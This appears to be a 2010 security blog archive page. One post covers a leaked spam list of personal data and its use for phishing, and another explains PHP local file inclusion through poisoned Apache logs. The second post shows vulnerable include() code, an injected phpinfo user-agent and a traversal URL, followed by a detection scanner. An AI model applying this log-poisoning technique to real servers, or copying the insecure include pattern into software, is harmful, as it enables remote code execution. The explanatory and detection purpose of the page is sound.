Monthly Archives: October 2010

Email Lists

23 Oct 2010

The Problem

Last week I came across a data set of 1 million emails that were said to have “opted in” to spam. It listed: email, name, address, city, state, zip, extended zip, phone number, date of birth, time added, IP and the source.

To anyone that’s a lot of personal information!

How did they get this information? I had a look at the source column, which contained these distinct values:

classifieds.com
amny.com
chicagotribune.com
baltimoresun.com
washingtonpost.com
careerbuilder.com
greenwichtime.com
orlandosun.com
apartments.com
metpronews.com
dailypress.com
courant.com
latimes.com
sun-sentinel.com
stamfordadvocate.com

My theory is they filled in all this unnecessary information on signup and left a box ticked that allowed the website to share this information.

The Attack

eBay sent this message to Steven Roddis (steven*****). Your registered name is included to show this message originated from eBay.

With a dump like the one I found, it’s easy to spoof eBay emails with more apparent legitimacy.

The Mitigation

Use fake info everywhere; sites like http://www.bugmenot.com, http://www.mailinator.com and http://www.fakenamegenerator.com can help.

Of course your bank and eBay should know your real name, DOB, etc., but the LA Times can think I’m:

Beulah Williams
4263 Joseph Street
Milwaukee, WI 53226

Attack Vector: Log Files

9 Oct 2010

I’ve had this on my mind for a long time, and I’ve finally felt like writing it up. How many times have you seen the bad code below?

<?php
include('pages/'.$_GET['page'].'.php');  //insecure code
?>

Any sane sysadmin will turn off allow_url_fopen to help mitigate remote file injection attacks, so you’re stuck with local file injection instead. However, most servers are configured to allow the web server user to read log files as well.
Log files look like this (on Apache):

1.1.1.1 - - [24/Aug/2010:05:19:38 -0700] "GET /j.php HTTP/1.1" 200 503 "http://www.example.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)"
1.1.1.1 - - [24/Aug/2010:05:19:39 -0700] "GET /j.php HTTP/1.1" 200 513 "<?php phpinfo(); ?>"

So if you can inject code into the log file through a custom user-agent, a simple http://www.example.com/?page=../../logs/example.com/http/access.log request will let you include the log file, which contains the code.
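Both halves of this leave traces in the same access log, so they can be found after the fact. The scanner below is an added example, not code from the original post: it flags lines where a client-controlled field carries a PHP open tag and lines where the page parameter climbs out of pages/. It assumes Apache's combined log format; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')     # request, referer, user-agent
PHP_TAG = re.compile(r"<\?(?:php|=|\s)", re.I)  # <?php, <?= and short tags
TRAVERSAL = re.compile(r"\.\.[/\\]")            # ../ or ..\

def decode(value, rounds=3):
    """Undo percent-encoding, repeated a bounded number of times."""
    for _ in range(rounds):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def classify(line, param="page"):
    """Return the findings for one access-log line as a set of labels."""
    findings = set()
    fields = QUOTED.findall(line)
    # Stage 1: PHP code written into the log via a client-controlled field.
    if any(PHP_TAG.search(decode(f)) for f in fields):
        findings.add("php-in-log")
    # Stage 2: the include parameter steered out of pages/.
    parts = fields[0].split(" ") if fields else []
    if len(parts) >= 2:
        query = parts[1].partition("?")[2]
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            if TRAVERSAL.search(decode(raw)):
                findings.add("include-traversal")
    return findings

def scan(lines):
    """Return (line number, sorted findings) for every flagged line."""
    hits = ((n, classify(text)) for n, text in enumerate(lines, 1))
    return [(n, sorted(found)) for n, found in hits if found]

# Constructed sample lines (documentation address, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [24/Aug/2010:05:19:38 -0700] "GET /?page=about HTTP/1.1" 200 503 "http://www.example.com/" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Aug/2010:05:19:39 -0700] "GET /j.php HTTP/1.1" 200 513 "-" "<?php phpinfo(); ?>"',
    '203.0.113.5 - - [24/Aug/2010:05:19:41 -0700] "GET /?page=../../logs/example.com/http/access.log HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Aug/2010:05:19:44 -0700] "GET /?page=%2e%2e%2f%2e%2e%2flogs%2fexample.com%2fhttp%2faccess.log HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE):
        print(number, ", ".join(found))
```

A "php-in-log" hit followed by an "include-traversal" hit from the same client is the sequence described above and is worth alerting on as a pair.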